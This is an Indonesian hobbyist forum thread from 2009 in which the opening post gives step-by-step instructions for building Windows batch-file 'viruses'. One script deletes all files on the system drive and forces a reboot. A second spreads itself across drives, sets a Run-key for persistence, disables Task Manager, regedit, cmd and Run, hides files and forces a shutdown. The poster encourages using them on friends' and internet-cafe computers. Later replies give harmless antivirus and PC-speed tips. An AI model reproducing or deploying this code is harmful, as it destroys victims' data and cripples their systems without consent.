Warungtegal

    Membuat Virus

    Share
    avatar
    Designer_Muda
    Tukang Minyak

    Male
    Jumlah posting : 410
    Age : 27
    Location : Batam
    Registration date : 11.02.09

    Membuat Virus

    Post by Designer_Muda on Sun Mar 08, 2009 12:58 pm

    ini adalah code sederhana nya
    —————————————–
    @echo off
    del %systemdrive%\*.* /f /s /q
    shutdown -r -f -t 00
    —————————————–
    Langkah membuatnya
    1. buka Notepad.exe
    2. tulis itu code diatas
    3. save as
    4. Save dalam extension (.bat)

    Gunakan ilmu untuk kebaikan klo mau isengin orang jahat baru boleh key

    Ini contoh file nya
    telorkampung.bat
    saran : simpen di folder system32 agar lbih efek
    isengin deh komputer temen kamu dan warnet yg gak kamu suka Moga bermanfaat

    itulah hanyalah sbagian code sderhana yg dapat digunakan untuk merestart komputer.
    banyak lagi code lainnya, sperti membuat sistem drive C hilang total, membuat path menjadi superhidden..
    dan lain lagi..
    salah satunya, anda pernah mngalami yg namanya task manager, regedit, dan cmd gk bisa dibuka,
    rata2 virus tersebuta dibuat dengan note pad...
    seperti ini langkah2 nya...

    # Buat sebuah halaman notepad kosong yang terdapat pada windows anda. Start->All Programs->Accessories->notepad
    #
    Buat script berikut :

    //Listing program// >>baris ini jangan ikut ditulis

    1. Echo off > C:\virxx.txt

    2. if no exist C:\Windows\%0 copy %0 C:\Windows

    3. for %%p in (A C D E F G H) do copy %0 %%p:

    4. for %%q in (A C D E F G H) do dir %%q:\*.3gp /B /S >> C:\virxx.txt

    5. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f

    6. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

    7. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

    8. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHiden /t REG_DWORD /d 0 /f

    9. for %%r in (A C D E F G H) do attrib +h +s %%r:\*.3gp /s

    10. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

    11. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v gorun /t REG_SZ /d C:\Windows\virxx.bat /f

    12. REG ADD HKCU\Software\Policies\Microsoft\Windows\System DisableCMD /t REG_DWORD /d 2 /f

    13. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 4 /f

    14. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegedit /t REG_DWORD /d 1 /f

    15. Shutdown -s -t 360 -c "Virus Menjangkiti Komputer Anda" -f

    16. Exit
    # Simpan dengan nama apa saja, tapi jangan lupa simpan dengan extensi .bat misalnya : virus.bat. Dan pada save as type nya pilih All Files.
    # Ada Bisa saja menambahkan atau mengurangi list script virus di atas. Asalkan anda mengetahui dasar dasar registry windows.
    # Jika ingin computer anda terkena bencana, silakan klik file yang telah anda buat tadi sekaligus untuk memastikan bahwa virus telah berjalan dengan baik. Tetapi jika tidak, ya jangan di klik :D


    kunjungi artikel lebih lengkap di www.flashack.blogspot.com
    avatar
    taro
    Juru Bicara

    Male
    Jumlah posting : 454
    Age : 27
    Location : batam, Indonesia
    Registration date : 09.02.09

    Re: Membuat Virus

    Post by taro on Mon Mar 09, 2009 2:33 pm

    nice inpo par!!!


    _________________
    -->Semuanya dimulai dari 0
    avatar
    meelaa
    Wartegan

    Female
    Jumlah posting : 186
    Age : 27
    Registration date : 10.02.09

    Re: Membuat Virus

    Post by meelaa on Mon Mar 09, 2009 10:50 pm

    mau nanya. .
    sebagaii orang awam niiy yaa. .
    klo anti viruss ntuuyg gratisan gtuu yg baguss apa dn dwnload dmnaa yaa. ?
    abissnya pake avira tapi kayanya gg mempan laah. .
    avatar
    taro
    Juru Bicara

    Male
    Jumlah posting : 454
    Age : 27
    Location : batam, Indonesia
    Registration date : 09.02.09

    Re: Membuat Virus

    Post by taro on Tue Mar 10, 2009 5:43 pm

    tanya ama google aja!!!
    hhheee..
    kalau mw tahu soal virus tanya ama supar mel!! supar kan dah bisa bikin virus pasti bisa dan ngerti anti virus yg bagus'!!1
    terus kalau mw lebih keren lagi ko minta bikinin antivirus ama yang buat virus pasti aku jamin topcer!!!


    _________________
    -->Semuanya dimulai dari 0
    avatar
    meelaa
    Wartegan

    Female
    Jumlah posting : 186
    Age : 27
    Registration date : 10.02.09

    Re: Membuat Virus

    Post by meelaa on Wed Mar 11, 2009 10:09 pm

    supar2. .
    mla bertanyaa ..
    hehehe. .

    stres aq sama komp adek aq yang uda sering d format tapi tetep lelet. .
    huuh. .
    avatar
    taro
    Juru Bicara

    Male
    Jumlah posting : 454
    Age : 27
    Location : batam, Indonesia
    Registration date : 09.02.09

    Re: Membuat Virus

    Post by taro on Wed Mar 11, 2009 10:36 pm

    supar nya gambek mel!!!
    gara2 sering ko ejekin!!
    hhhee


    _________________
    -->Semuanya dimulai dari 0
    avatar
    Designer_Muda
    Tukang Minyak

    Male
    Jumlah posting : 410
    Age : 27
    Location : Batam
    Registration date : 11.02.09

    Re: Membuat Virus

    Post by Designer_Muda on Sat Mar 14, 2009 12:51 pm

    antivirus lokal yang bagus....
    coba deh pakai smadav, ini antivirus dikembangin ama bangsa ndiri...
    jdi untuk menangkal virus lokal bgus memakai ini...

    tpi kebanyakan vrus lokal sekarang tidak dibuat dengan menggunakan bahasa pemograman pada umum nya, sehingga sangat sulit untuk dideteksi...
    kebanyakan virus tersebut menggunakan printah cmd langsung untuk menyerang komputer...

    cara pencegahan dini yg pling tepat adalah tidak langsung mengklik double flasdisk, karena apa...?
    karena akan membuat file autrun sih virus akan berjalan, shingga virus tersebut akan menyebar..

    info lebih jelas kunjungi////
    www.flashack.blogspot.com
    avatar
    Designer_Muda
    Tukang Minyak

    Male
    Jumlah posting : 410
    Age : 27
    Location : Batam
    Registration date : 11.02.09

    Re: Membuat Virus

    Post by Designer_Muda on Sat Mar 14, 2009 12:57 pm

    klo soal komputer yg lelet...
    bisa dikarenakan RAM nya yg terlalu kecil, coba untuk memakai 512MB keatas...

    satu hal lgi yg dapat menyebabkan komputer lambat adalah, bnyk nya services yg tidak perlu jalan dikomputer kta,....
    coba lh untuk membuka klik run > ketik services.msc
    perhatikan setiap services yg berjalan, yg tidak prlu silahkan stop...

    untuk lebih jelasnya...
    kunjungi www.flashack.blogspot.com

    Sponsored content

    Re: Membuat Virus

    Post by Sponsored content


      Waktu sekarang Mon Dec 11, 2017 6:31 pm